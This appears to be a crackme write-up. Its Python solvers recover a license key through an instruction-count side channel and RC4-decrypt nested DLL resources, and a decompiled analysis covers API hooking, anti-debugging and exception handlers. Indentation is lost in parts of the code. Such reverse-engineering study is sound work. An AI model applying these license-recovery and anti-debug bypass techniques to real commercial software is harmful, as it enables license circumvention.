    if limit > TOTAL_BITS:
        limit = TOTAL_BITS

    newly = []
    conflict = None
    for g in range(limit):
        q, b = gbit_to_qb(g)
        observed = enc_bit(enc32, g)
        key = (q, b)
        if key not in fixed_bits:
            fixed_bits[key] = observed
            newly.append((q, b, observed))
            continue
        known = fixed_bits[key]
        if known != observed:
            conflict = {"gbit": g, "q": q, "bit": b, "old": known, "new": observed}
            break
    return newly, conflict

def save_ckpt(path: Path, data: Dict[str, Any]):
    """Write `data` to `path` as indented UTF-8 JSON, replacing any existing file."""
    text = json.dumps(data, ensure_ascii=False, indent=2)
    path.write_text(text, encoding="utf-8")

def load_ckpt(path: Path) -> Optional[Dict[str, Any]]:
    """Return the JSON content of `path`, or None when the file does not exist."""
    if path.exists():
        raw = path.read_text(encoding="utf-8", errors="ignore")
        return json.loads(raw)
    return None

def encode_fixed_bits(fixed_bits: Dict[Tuple[int, int], int]) -> List[Dict[str, int]]:
    """Turn `fixed_bits` into a JSON-friendly list of {"q", "bit", "v"} dicts, sorted by key."""
    return [
        {"q": q, "bit": b, "v": int(v)}
        for (q, b), v in sorted(fixed_bits.items())
    ]

def decode_fixed_bits(arr: List[Dict[str, int]]) -> Dict[Tuple[int, int], int]:
    """Rebuild the (q, bit) -> value mapping from a list of {"q", "bit", "v"} dicts."""
    return {(int(item["q"]), int(item["bit"])): int(item["v"]) for item in arr}

def run(args):
workdir = Path(args.workdir).resolve()
ckpt_path = workdir / args.ckpt
result_path = workdir / args.result_json
pin_cmd = [args.pin, "-t", args.tool]
if args.tool_out_knob: pin_cmd += ["-o", args.shr_file]
pin_cmd += ["--", args.app]
oracle = ShrOracle(
workdir=workdir,
pin_cmd=pin_cmd,
input_file=args.input_file,
shr_file=args.shr_file,
timeout_sec=args.timeout,
retries=args.oracle_retries,
samples=args.oracle_samples)
printable_only = bool(getattr(args, "printable_only", True))
printable_min = int(getattr(args, "printable_min", 0x20))
printable_max = int(getattr(args, "printable_max", 0x7E))
allowed_charset = getattr(args, "allowed_charset", None)
if isinstance(allowed_charset, str): allowed_charset = allowed_charset.encode("utf-8")
fixed_bits: Dict[Tuple[int, int], int] = {}
current_q = 0
bit63_ambiguous: Dict[int, bool] = {}
probe_cache: Dict[Tuple[Tuple[int, int, int], ...], Tuple[Optional[int], Optional[str], Optional[str], str]] = {}
if args.resume and ckpt_path.exists():
ck = load_ckpt(ckpt_path)
fixed_bits = decode_fixed_bits(ck.get("fixed_bits", []))
current_q = int(ck.get("current_q", 0))
bit63_ambiguous = {int(q): True for q in ck.get("bit63_ambiguous", [])}
print(f"[+] recover from checkpoint: q={current_q}, fixed_bits={len(fixed_bits)}")
else: print("[+] start")

def cache_key(fb: Dict[Tuple[int, int], int]): return tuple(sorted((q, b, int(v)) for (q, b), v in fb.items()))
def solve_sat_only(fb: Dict[Tuple[int, int], int]):
return solve_one_input(
fb,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)

def probe(fb: Dict[Tuple[int, int], int]):
k = cache_key(fb)
if k in probe_cache: return probe_cache[k]
sat_one = solve_sat_only(fb)
if sat_one is None:
probe_cache[k] = (None, None, None, "unsat")
return probe_cache[k]
inp32, enc32 = sat_one
try:
sc = oracle.query(inp32)
probe_cache[k] = (sc, inp32.hex(), enc32.hex(), "ok")
except Exception as e: probe_cache[k] = (None, inp32.hex(), enc32.hex(), f"oracle_error:{e}")
return probe_cache[k]

def is_sat_status(st: str) -> bool: return st != "unsat"
def dump_ckpt(note: str):
obj = {
"note": note,
"current_q": current_q,
"fixed_bits_count": len(fixed_bits),
"fixed_bits": encode_fixed_bits(fixed_bits),
"bit63_ambiguous": sorted([q for q, v in bit63_ambiguous.items() if v]),
"fixed_cipher_hex32_partial": fixed_cipher_hex32(fixed_bits),
"ts": time.time(),
"cmd": pin_cmd
}
save_ckpt(ckpt_path, obj)

def clear_ambiguous_from_q(q_start: int):
for qq in range(q_start, N_QWORDS): bit63_ambiguous.pop(qq, None)

def decide_bit63_for_q(q: int):
c0 = dict(fixed_bits); c0[(q, 63)] = 0
c1 = dict(fixed_bits); c1[(q, 63)] = 1
r0 = probe(c0)
r1 = probe(c1)
s0, _, _, st0 = r0
s1, _, _, st1 = r1
sat0 = is_sat_status(st0)
sat1 = is_sat_status(st1)
print(f"[q{q} bit63 SAT-check] 0->{s0} ({st0}), 1->{s1} ({st1})")
if sat0 and not sat1:
fixed_bits[(q, 63)] = 0
bit63_ambiguous[q] = False
print(f"[q{q}] bit63 = 0 (only SAT)")
return
if sat1 and not sat0:
fixed_bits[(q, 63)] = 1
bit63_ambiguous[q] = False
print(f"[q{q}] bit63 = 1 (only SAT)")
return
if (not sat0) and (not sat1):
raise RuntimeError(f"[q{q}] bit63: both branches UNSAT under printable constraints")
bit63_ambiguous[q] = True
if q < N_QWORDS - 1:
fixed_bits[(q, 63)] = 0
print(f"[q{q}] bit63 0/1 both SAT -> tentative 0, will verify by next q")
else:
fixed_bits.pop((q, 63), None)
print(f"[q{q}] bit63 0/1 both SAT -> keep unresolved for final stage")

for q in range(current_q, N_QWORDS):
current_q = q
print(f"\n========== Recovering qword{q} ==========")
while True:
restart = False
bit = 0
while bit <= 62:
if (q, bit) in fixed_bits:
bit += 1
continue
c0 = dict(fixed_bits); c0[(q, bit)] = 0
c1 = dict(fixed_bits); c1[(q, bit)] = 1
r0 = probe(c0)
r1 = probe(c1)
s0, i0, e0, st0 = r0
s1, i1, e1, st1 = r1
sat0 = is_sat_status(st0)
sat1 = is_sat_status(st1)
print(f"[q{q} bit{bit}] 0->{s0} ({st0}), 1->{s1} ({st1})")
if (
q > 0 and bit == 0 and sat0 and sat1
and (s0 is not None) and (s1 is not None) and (s0 == s1)
and bit63_ambiguous.get(q - 1, False)):
prev = fixed_bits.get((q - 1, 63), 0)
if prev == 0:
print(f" [rule] q{q} bit0 0/1 same score={s0}, flip q{q-1}.bit63: 0->1 and restart q{q}")
fixed_bits[(q - 1, 63)] = 1
bit63_ambiguous[q - 1] = False
clear_from_qword(fixed_bits, q)
clear_ambiguous_from_q(q)
probe_cache.clear()
dump_ckpt(note=f"rollback: set q{q-1}.bit63=1 then restart q{q}")
restart = True
break
if (not sat0) and (not sat1): raise RuntimeError(f"q{q} bit{bit}: both branches UNSAT under printable constraints")
if sat0 and (not sat1):
chosen_bit = 0
sb, ib, eb, stb = r0
elif sat1 and (not sat0):
chosen_bit = 1
sb, ib, eb, stb = r1
else:
if (s0 is None) and (s1 is None):
chosen_bit = 0
sb, ib, eb, stb = r0
print(" [warn] both SAT but no score, fallback choose bit=0")
elif s0 is None:
chosen_bit = 1
sb, ib, eb, stb = r1
elif s1 is None:
chosen_bit = 0
sb, ib, eb, stb = r0
else:
if s1 > s0:
chosen_bit = 1
sb, ib, eb, stb = r1
elif s0 > s1:
chosen_bit = 0
sb, ib, eb, stb = r0
else:
chosen_bit = 0
sb, ib, eb, stb = r0
if eb is None: raise RuntimeError(f"q{q} bit{bit}: chosen branch has no enc hex")
if sb is not None:
enc32 = bytes.fromhex(eb)
newly, conflict = absorb_by_score(fixed_bits, enc32, sb)
else: newly, conflict = [], None
if (q, bit) not in fixed_bits: fixed_bits[(q, bit)] = chosen_bit
print(f" -> bit{bit}={chosen_bit}, score={sb}, auto_add={len(newly)}")
if conflict is not None: print(f" [warn] absorb conflict at gbit={conflict['gbit']}, old={conflict['old']} new={conflict['new']}")
sample = [(qq, bb, vv) for (qq, bb, vv) in newly if qq == q and bb >= bit][:8]
if sample: print(f" auto sample: {sample}")
dump_ckpt(note=f"q{q} bit{bit} choose {chosen_bit} score={sb}")
bit += 1
if restart: continue
decide_bit63_for_q(q)
dump_ckpt(note=f"q{q} bit63 decided/marked")
uniq, one_hex, alt_hex = qword_plain_uniqueness(
fixed_bits,
q,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
if uniq: print(f"[q{q}] Unique: {one_hex}")
else: print(f"[q{q}] Not unique: one={one_hex}, alt={alt_hex}")
break
print("\n========== Final output ==========")
final_msb_list: List[int]
if (3, 63) in fixed_bits and (not bit63_ambiguous.get(3, False)): final_msb_list = [fixed_bits[(3, 63)]]
else: final_msb_list = [0, 1]
candidates = []
sat_count = 0
for msb in final_msb_list:
fb = dict(fixed_bits)
fb[(3, 63)] = msb
sat_one = solve_one_input(
fb,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
if sat_one is None:
print(f"[final msb={msb}] UNSAT (printable)")
continue
sat_count += 1
inp32, enc32 = sat_one
try:
score = oracle.query(inp32)
status = "ok"
except Exception as e:
score = None
status = f"oracle_error:{e}"
u0 = qword_plain_uniqueness(
fb, 0,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
u1 = qword_plain_uniqueness(
fb, 1,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
u2 = qword_plain_uniqueness(
fb, 2,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
u3 = qword_plain_uniqueness(
fb, 3,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
item = {
"q3_msb": msb,
"status": status,
"shr_num": score,
"input32_hex": inp32.hex(),
"enc32_hex": enc32.hex(),
"fixed_cipher_hex32": fixed_cipher_hex32(fb),
"uniqueness": {
"q0": {"unique": u0[0], "one": u0[1], "alt": u0[2]},
"q1": {"unique": u1[0], "one": u1[1], "alt": u1[2]},
"q2": {"unique": u2[0], "one": u2[1], "alt": u2[2]},
"q3": {"unique": u3[0], "one": u3[1], "alt": u3[2]}}}
candidates.append(item)
print(f"[final msb={msb}] status={status}, shr={score}")
print(f" input32 = {item['input32_hex']}")
if sat_count == 0: raise RuntimeError("final stage: both q3.msb branches UNSAT under printable constraints")
out = {
"config": {
"workdir": str(workdir),
"pin_cmd": pin_cmd,
"input_file": args.input_file,
"shr_file": args.shr_file,
"allow_zero_input": args.allow_zero_input,
"oracle_samples": args.oracle_samples,
"printable_only": printable_only,
"printable_min": printable_min,
"printable_max": printable_max,
"allowed_charset": None if allowed_charset is None else allowed_charset.decode("latin1", errors="ignore")
},
"fixed_bits_count": len(fixed_bits),
"fixed_bits_partial_hex32": fixed_cipher_hex32(fixed_bits),
"bit63_ambiguous": sorted([q for q, v in bit63_ambiguous.items() if v]),
"candidates": candidates}
result_path.write_text(json.dumps(out, ensure_ascii=False, indent=2), encoding="utf-8")
dump_ckpt(note="finished")
print(f"\n[+] Done: {result_path}")
print(f"[+] checkpoint: {ckpt_path}")

def parse_args():
    """Parse the command line of the recovery script.

    Returns:
        argparse.Namespace holding the options registered below, read
        from ``sys.argv``.
    """
    parser = argparse.ArgumentParser()
    # (flag, add_argument keyword arguments), registered in this order so
    # that the generated --help output keeps the same layout.
    option_table = [
        ("--workdir", {"default": "."}),
        ("--pin", {"default": "pin"}),
        ("--tool", {"default": "Count.dll"}),
        ("--app", {"default": "LicenseChecker.exe"}),
        ("--tool-out-knob", {"action": "store_true"}),
        ("--input-file", {"default": "license.bin"}),
        ("--shr-file", {"default": "shr_num.txt"}),
        ("--timeout", {"type": float, "default": 15.0}),
        ("--oracle-retries", {"type": int, "default": 2}),
        ("--oracle-samples", {"type": int, "default": 1}),
        ("--allow-zero-input", {"action": "store_true"}),
        ("--resume", {"action": "store_true"}),
        ("--ckpt", {"default": "recover_ckpt.json"}),
        ("--result-json", {"default": "recover_result.json"}),
    ]
    for flag, options in option_table:
        parser.add_argument(flag, **options)
    return parser.parse_args()

# Script entry point: parse the command line and pass the options to run().
if __name__ == "__main__":
args = parse_args()
run(args)

The first 32 bytes are: M0Oo8zjHkcPSWFzCxmw6jrj1RgNPucTH. The decryption function is RC4, and the decrypted resource is a new DLL.

AutoLicense:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
# -*- coding: utf-8 -*-

import argparse
import json
import os
import re
import subprocess
import sys
from pathlib import Path
from typing import Dict, List, Optional, Tuple
import pefile

# Matches indexed result file names such as recover_result_3.json
# (case-insensitive); group 1 captures the numeric index.
IDX_RE = re.compile(r"^recover_result_(\d+)\.json$", re.IGNORECASE)

def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Apply the RC4 stream cipher to ``data`` under ``key``.

    The keystream is XORed onto the input, so the same call both encrypts
    and decrypts.

    Args:
        key: non-empty key bytes.
        data: bytes to transform.

    Returns:
        A ``bytes`` object of the same length as ``data``.

    Raises:
        ValueError: if ``key`` is empty.
    """
    if not key:
        raise ValueError("RC4 key cant be empty")

    # Key scheduling: shuffle the identity permutation under the key.
    state = list(range(256))
    key_size = len(key)
    mix = 0
    for pos in range(256):
        mix = (mix + state[pos] + key[pos % key_size]) % 256
        state[pos], state[mix] = state[mix], state[pos]

    def keystream():
        # Pseudo-random generation: one keystream byte per request.
        a = 0
        b = 0
        while True:
            a = (a + 1) % 256
            b = (b + state[a]) % 256
            state[a], state[b] = state[b], state[a]
            yield state[(state[a] + state[b]) % 256]

    result = bytearray(len(data))
    for offset, (plain, pad) in enumerate(zip(data, keystream())):
        result[offset] = plain ^ pad
    return bytes(result)

def list_indexed_results(workdir: Path) -> Dict[int, Path]:
    """Collect the indexed result files found directly inside ``workdir``.

    Returns:
        A dict mapping the integer index parsed from each
        ``recover_result_<idx>.json`` file name to that file's path.
    """
    candidates = (
        (IDX_RE.match(path.name), path)
        for path in workdir.glob("recover_result_*.json")
    )
    # The glob is broader than the regex, so keep only names IDX_RE accepts.
    return {int(found.group(1)): path for found, path in candidates if found}

def safe_int(v, default=-1) -> int:
    """Convert ``v`` with ``int()``; return ``default`` if the conversion raises."""
    try:
        converted = int(v)
    except Exception:
        return default
    return converted

def candidate_score(c: dict) -> Tuple[int, int, int]:
    """Build the ranking key of one recovery candidate.

    Returns:
        ``(ok, unique_count, shr)`` where ``ok`` is 1 when the candidate's
        ``status`` string starts with ``"ok"``, ``unique_count`` counts the
        q0..q3 entries of ``uniqueness`` flagged ``unique``, and ``shr`` is
        ``shr_num`` as an int (-1 when it cannot be converted).
    """
    ok_flag = int(str(c.get("status", "")).startswith("ok"))

    uniqueness = c.get("uniqueness", {})
    unique_total = 0
    if isinstance(uniqueness, dict):
        per_qword = (uniqueness.get(name, {}) for name in ("q0", "q1", "q2", "q3"))
        unique_total = sum(
            1 for info in per_qword
            if isinstance(info, dict) and bool(info.get("unique"))
        )

    return (ok_flag, unique_total, safe_int(c.get("shr_num"), -1))

def load_rc4_key_from_recover_result(path: Path) -> bytes:
    """Read a recover-result JSON file and return its best 32-byte key.

    Only candidates whose ``input32_hex`` is exactly 64 hex digits are
    considered; the one with the highest ``candidate_score`` is used.

    Raises:
        RuntimeError: if the file has no candidate list, no candidate with
            a well-formed ``input32_hex``, or the decoded key is not 32 bytes.
    """
    document = json.loads(path.read_text(encoding="utf-8", errors="ignore"))
    candidates = document.get("candidates", [])
    if not (isinstance(candidates, list) and candidates):
        raise RuntimeError(f"{path.name} has no candidates")

    usable = []
    for cand in candidates:
        hex_key = (cand.get("input32_hex") or "").strip().lower()
        if re.fullmatch(r"[0-9a-f]{64}", hex_key):
            usable.append((candidate_score(cand), cand, hex_key))
    if not usable:
        raise RuntimeError(f"{path.name} candidates has no input32_hex(64 hex)")

    # max() keeps the earliest entry among equal scores, which is the same
    # winner a stable descending sort would put first.
    top_score, top_cand, top_hex = max(usable, key=lambda entry: entry[0])
    key = bytes.fromhex(top_hex)
    if len(key) != 32:
        raise RuntimeError(f"{path.name} keylen != 32")
    print(
        f"[key] use {path.name}: score={top_score}, "
        f"status={top_cand.get('status')}, shr={top_cand.get('shr_num')}, key={top_hex}")
    return key

def extract_named_resource(pe_path: Path, target_name: str) -> Optional[bytes]:
    """Return the data of the first resource whose name equals ``target_name``.

    The name comparison is case-insensitive and ignores trailing NULs.
    Resources identified only by ID (no name) are skipped.

    Returns:
        The resource bytes, or ``None`` when the PE has no resource
        directory or no matching named entry.
    """
    wanted = target_name.upper()
    pe = pefile.PE(str(pe_path), fast_load=False)
    try:
        if hasattr(pe, "DIRECTORY_ENTRY_RESOURCE"):
            for type_entry in pe.DIRECTORY_ENTRY_RESOURCE.entries:
                if not hasattr(type_entry, "directory"):
                    continue
                for name_entry in type_entry.directory.entries:
                    if name_entry.name is None:
                        continue
                    if str(name_entry.name).rstrip("\x00").upper() != wanted:
                        continue
                    if not hasattr(name_entry, "directory"):
                        continue
                    # The first language entry under the matching name wins.
                    for lang_entry in name_entry.directory.entries:
                        info = lang_entry.data.struct
                        return pe.get_data(info.OffsetToData, info.Size)
        return None
    finally:
        pe.close()

def run_auto_script(
    workdir: Path,
    python_exe: str,
    auto_script: str,
    auto_args: List[str],
    recover_result_name: str,
    timeout_sec: Optional[int],
    quiet: bool) -> int:
    """Run the recovery script as a subprocess inside ``workdir``.

    Any stale result file is deleted first, so that a result file present
    afterwards is known to come from this run.

    Returns:
        The subprocess return code.

    Raises:
        RuntimeError: if the script did not leave ``recover_result_name``
            in ``workdir``.
    """
    expected_output = workdir / recover_result_name
    if expected_output.exists():
        expected_output.unlink()

    command = [python_exe, auto_script] + auto_args
    print(f"[auto] run: {' '.join(command)}")

    # In quiet mode both output streams of the child are discarded.
    sink = subprocess.DEVNULL if quiet else None
    completed = subprocess.run(
        command,
        cwd=str(workdir),
        stdout=sink,
        stderr=sink,
        timeout=timeout_sec,
        check=False,
    )
    if expected_output.exists():
        return completed.returncode
    raise RuntimeError(f"auto.py returns no {recover_result_name} (returncode={completed.returncode})")

def bootstrap_initial_result0(
    workdir: Path,
    python_exe: str,
    auto_script: str,
    auto_args: List[str],
    recover_result_name: str,
    timeout_sec: Optional[int],
    quiet: bool,):
    """Make sure ``recover_result_0.json`` exists before the main loop runs.

    Does nothing when any indexed result file is already present.
    Otherwise an existing un-indexed result file is renamed to index 0, or,
    if there is none, the recovery script is run once and its output is
    renamed.

    Raises:
        RuntimeError: if ``recover_result_0.json`` already exists at the
            moment the rename is about to happen.
    """
    if list_indexed_results(workdir):
        return

    unindexed = workdir / recover_result_name
    first_indexed = workdir / "recover_result_0.json"

    if not unindexed.exists():
        print("[bootstrap] no recover_result found, run auto.py to generate initial key")
        run_auto_script(
            workdir=workdir,
            python_exe=python_exe,
            auto_script=auto_script,
            auto_args=auto_args,
            recover_result_name=recover_result_name,
            timeout_sec=timeout_sec,
            quiet=quiet,
        )
        if first_indexed.exists():
            raise RuntimeError("Gen recover_result.json but recover_result_0.json exists")
        (workdir / recover_result_name).replace(first_indexed)
    elif first_indexed.exists():
        raise RuntimeError("Exist recover_result.json and recover_result_0.json exists but conflict.")
    else:
        unindexed.replace(first_indexed)

    print("[bootstrap] recover_result.json -> recover_result_0.json")

# Driver of the nested-DLL unpacking loop. Each round:
#   1. picks the highest-indexed recover_result_<idx>.json as the key source,
#   2. extracts the named resource from the current DLL (finishing when the
#      DLL no longer carries it),
#   3. RC4-decrypts the resource with the key, backs the old DLL up as
#      <stem>_<idx><suffix> and writes the decrypted bytes in its place,
#   4. runs the recovery script and renames its output to index idx + 1.
# Raises FileNotFoundError when the DLL or the script is missing, and
# RuntimeError when no indexed result exists or --max-rounds is exhausted.
# NOTE(review): indentation was lost in this listing; in particular, whether
# the next_result_path.exists() check sits inside the else branch or at loop
# level cannot be told from the text here. Confirm against the original script.
def main():
ap = argparse.ArgumentParser(description="Matryoshka")
ap.add_argument("--workdir", default=".")
ap.add_argument("--dll", default="Doll.dll")
ap.add_argument("--resource-name", default="MATRYOSHKA")
ap.add_argument("--recover-result-name", default="recover_result.json")
ap.add_argument("--auto-script", default="autore.py")
ap.add_argument("--python", dest="python_exe", default=sys.executable)
# Repeatable: every --auto-arg value is forwarded to the recovery script.
ap.add_argument("--auto-arg", action="append", default=[])
ap.add_argument("--timeout", type=int, default=None)
ap.add_argument("--max-rounds", type=int, default=200)
ap.add_argument("--quiet", action="store_true")
args = ap.parse_args()
workdir = Path(args.workdir).resolve()
dll_path = workdir / args.dll
if not dll_path.exists(): raise FileNotFoundError(f"DLL not found: {dll_path}")
auto_script_path = workdir / args.auto_script
if not auto_script_path.exists(): raise FileNotFoundError(f"Script not found: {auto_script_path}")
print(f"[+] workdir = {workdir}")
print(f"[+] dll = {dll_path.name}")
print(f"[+] auto = {args.auto_script}")
# Guarantee that an index-0 result (the first key) exists before looping.
bootstrap_initial_result0(
workdir=workdir,
python_exe=args.python_exe,
auto_script=args.auto_script,
auto_args=args.auto_arg,
recover_result_name=args.recover_result_name,
timeout_sec=args.timeout,
quiet=args.quiet,)
stem = dll_path.stem
suffix = dll_path.suffix
for round_i in range(args.max_rounds):
# Re-scan every round: the previous round may have added a new result.
indexed = list_indexed_results(workdir)
if not indexed: raise RuntimeError("No recover_result_<idx>.json")
idx = max(indexed.keys())
result_idx_path = indexed[idx]
next_result_path = workdir / f"recover_result_{idx + 1}.json"
print(f"\n===== ROUND {round_i} | idx={idx} =====")
print(f"[state] current key source: {result_idx_path.name}")
mat_blob = extract_named_resource(dll_path, args.resource_name)
# No embedded resource left: the innermost layer has been reached.
if mat_blob is None:
print(f"[done] {dll_path.name} has no {args.resource_name}")
return
print(f"[res] found {args.resource_name}, size={len(mat_blob)} bytes")
key = load_rc4_key_from_recover_result(result_idx_path)
backup_dll = workdir / f"{stem}_{idx}{suffix}"
# An existing backup for this index is taken to mean this layer was
# already decrypted, so the decrypt-and-replace step is skipped.
if backup_dll.exists():
print(f"[skip] {backup_dll.name} exists")
else:
dec = rc4_crypt(key, mat_blob)
# Move the current DLL aside first, then write the decrypted layer
# under the original file name.
os.replace(dll_path, backup_dll)
dll_path.write_bytes(dec)
print(f"[ok] backup old -> {backup_dll.name}")
print(f"[ok] write decrypted -> {dll_path.name} ({len(dec)} bytes)")
if next_result_path.exists():
print(f"[skip] {next_result_path.name} already exists, skip auto.py")
continue
rc = run_auto_script(
workdir=workdir,
python_exe=args.python_exe,
auto_script=args.auto_script,
auto_args=args.auto_arg,
recover_result_name=args.recover_result_name,
timeout_sec=args.timeout,
quiet=args.quiet,)
plain_result = workdir / args.recover_result_name
# Index the fresh result so the next round uses it as its key source.
plain_result.replace(next_result_path)
print(f"[ok] auto.py rc={rc}, rename -> {next_result_path.name}")
# Reached only when every round ran without hitting the "[done]" return.
raise RuntimeError(f"Reach max_rounds={args.max_rounds}")

# Script entry point.
if __name__ == "__main__":
main()

CMO{1NsiD3_EV3RY_stOrY_lIe$_an0TH3r_s70Ry_WAITiNG_7o_bE_oPEn3d}

Crackme #9

There are many functions filled with junk code. After removing the obfuscation, some of them share a similar structure:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
// Common shape of the de-obfuscated stubs. XX and Val are placeholders that
// stand for the per-stub slot index and lookup value.
int __thiscall Obf_funcXX(_DWORD *this)
{
this_1 = this;
// Resolve only while slot XX is still zero; afterwards the stored value is reused.
if ( !this[XX] )
{
xx = Val;
v4[1] = *this_1;
v5 = Obf_funcXX(this_1);
// sub_401CBA is the DLL-function lookup described in the write-up.
v2 = sub_401CBA(v4, v5, Val);
v3 = sub_40118D(v2);
// NOTE(review): the listing stores into slot 12 but tests and returns slot XX;
// presumably 12 is the index of one concrete stub. Confirm.
this_1[12] = v3;
}
return this_1[XX];
}

sub_401CBA is a function that looks up DLL functions:

Address of function Name sub_401CBA returns
sub_401397 user32_CallWindowProcA
sub_401010, sub_4013DA advapi32_CryptAcquireContextA
sub_401022, sub_401443 advapi32_CryptCreateHash
sub_401058, sub_40158D advapi32_CryptDestroyHash
sub_40107C, sub_40166A advapi32_CryptGetHashParam
sub_40108E, sub_4016DF advapi32_CryptHashData
sub_402C24, sub_40187A ntdll_KiUserExceptionDispatcher
sub_4010E4, sub_40194C ntdll_NtContinue
sub_4010F6, sub_4019B5 ntdll_NtQueryInformationProcess
sub_402BC7, sub_401B2E ntdll_Wow64Transition

Notice that there is a function executed before main:

1
2
3
4
5
6
7
// Runs before main (per the write-up): after two setup calls it overwrites the
// CallWindowProcA pointer with sub_402E5A, so later calls go through the hook.
void *__thiscall Hook_CallWindowProcA(void *this)
{
sub_40113E();
sub_40112C();
CallWindowProcA = (LRESULT (__stdcall *)(WNDPROC, HWND, UINT, WPARAM, LPARAM))sub_402E5A;
return this;
}

This function replaces the address of CallWindowProcA with a custom function, sub_402E5A. That function is:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// Replacement for CallWindowProcA (sub_402E5A). It runs the anti-debug check,
// performs one of two setup paths, then forwards the call unchanged.
int __stdcall Hooked_CallWindowProcA(int a1, int a2, int a3, int a4, int a5)
{
v5 = sub_402BF1();
// sub_402B6D is the anti-debug check: per the write-up it returns 1 when a
// debugger is present.
if ( sub_402B6D(v5) )
{
v6 = (_BYTE *)sub_402CAC();
sub_402CE0(v6);
}
else
{
sub_402CAC();
// No debugger: sub_402C24 (listed in the lookup table next to
// ntdll_KiUserExceptionDispatcher) receives p_sub_402E1C, which the write-up
// describes as installing the exception handlers.
sub_402C24(p_sub_402E1C, &unk_40D24C);
}
v7 = sub_401367();
// sub_401397 is listed in the lookup table as user32_CallWindowProcA, so v9 is
// the real API and the original arguments are passed through to it.
v9 = (int (__cdecl *)(int, int, int, int, int))sub_401397(v7);
return v9(a1, a2, a3, a4, a5);
}

sub_402B6D is an anti-debug function that returns 1 if a debugger is present. p_sub_402E1C installs the exception handlers:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
// Exception entry stub: saves its argument and return address in globals, lets
// sub_404562 dispatch on the exception, then resumes through sub_4010E4.
void __cdecl __noreturn p_sub_402E1C(int a1)
{
unk_40D254 = a1;
dword_40D250 = retaddr;
v1 = sub_40448C();
// Dispatch to the per-exception-code handler (see sub_404562).
sub_404562(v1, (_DWORD *)dword_40D250, unk_40D254);
v2 = sub_40113E();
// sub_4010E4 is listed in the lookup table as ntdll_NtContinue; it is called
// with the saved a1, presumably the CONTEXT to resume. Confirm.
sub_4010E4(v2, unk_40D254, 0);
// Not expected to be reached: the function is marked __noreturn.
__debugbreak();
}

// Dispatches on the code stored at *a2, but only while the byte at this+8 is
// zero. The three handled values look like the NTSTATUS codes
// STATUS_BREAKPOINT (0x80000003), STATUS_SINGLE_STEP (0x80000004) and
// STATUS_GUARD_PAGE_VIOLATION (0x80000001). Confirm against the NTSTATUS table.
_DWORD *__thiscall sub_404562(int this, _DWORD *a2, int a3)
{
if ( !*(_BYTE *)(this + 8) )
{
result = a2;
switch ( *a2 )
{
case 0x80000003:
return (_DWORD *)sub_4042EC((_DWORD *)this, a3);
case 0x80000004:
return (_DWORD *)sub_4043CA(this, a3);
case 0x80000001:
// Only this handler also receives a2 itself.
return (_DWORD *)sub_404350(this, (int)a2, a3);
}
}
// NOTE(review): when the byte at this+8 is set, result is never assigned in
// this listing. Presumably a decompiler artifact.
return result;
}

Next, for the program's interaction logic, check the dialog's vftable:

1
2
3
4
5
6
7
8
9
.rdata:0040B3F0                 dd offset ??_R4MainDialog@@6B@ ; const MainDialog::`RTTI Complete Object Locator'
.rdata:0040B3F4 ; const MainDialog::`vftable'
.rdata:0040B3F4 ??_7MainDialog@@6B@ dd offset sub_405377
.rdata:0040B3F4 ; DATA XREF: sub_405196+15↑o
.rdata:0040B3F4 ; sub_4052B8+7↑o
.rdata:0040B3F8 dd offset sub_4055D3
.rdata:0040B3FC dd offset sub_405536
.rdata:0040B400 dd offset sub_404E71
.rdata:0040B404 dd offset sub_405497

Interface selection function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
// Command dispatcher of the main dialog: a3 selects the action. Returns 1 when
// the value was handled and 0 otherwise.
int __userpurge sub_405536@<eax>(int a1@<ecx>, int a2@<ebx>, __int16 a3, int a4)
{
switch ( a3 )
{
case 1001:
// The input check (sub_405399, shown below in the write-up).
sub_405399(a1, a2);
break;
case 1002:
// Builds and shows a secondary dialog from resource 132.
hInstance = *(HINSTANCE *)(a1 + 4);
sub_4025EC(v7, &unk_40B3CD);
sub_40574D(hInstance, 132, v7[0], v7[1], v7[2], v7[3], v7[4], v7[5]);
sub_404E89((LPARAM)dwInitParam, *(HWND *)(a1 + 8));
sub_4057DA(dwInitParam);
break;
case 1003:
// Closes the dialog whose HWND is stored at a1 + 8.
EndDialog(*(HWND *)(a1 + 8), 0);
break;
case 1007:
sub_405702();
break;
case 1010:
// Opens the crackmes.one site through the shell.
ShellExecuteA(0, "open", "https://crackmes.one", 0, 0, 3);
break;
default:
return 0;
}
return 1;
}

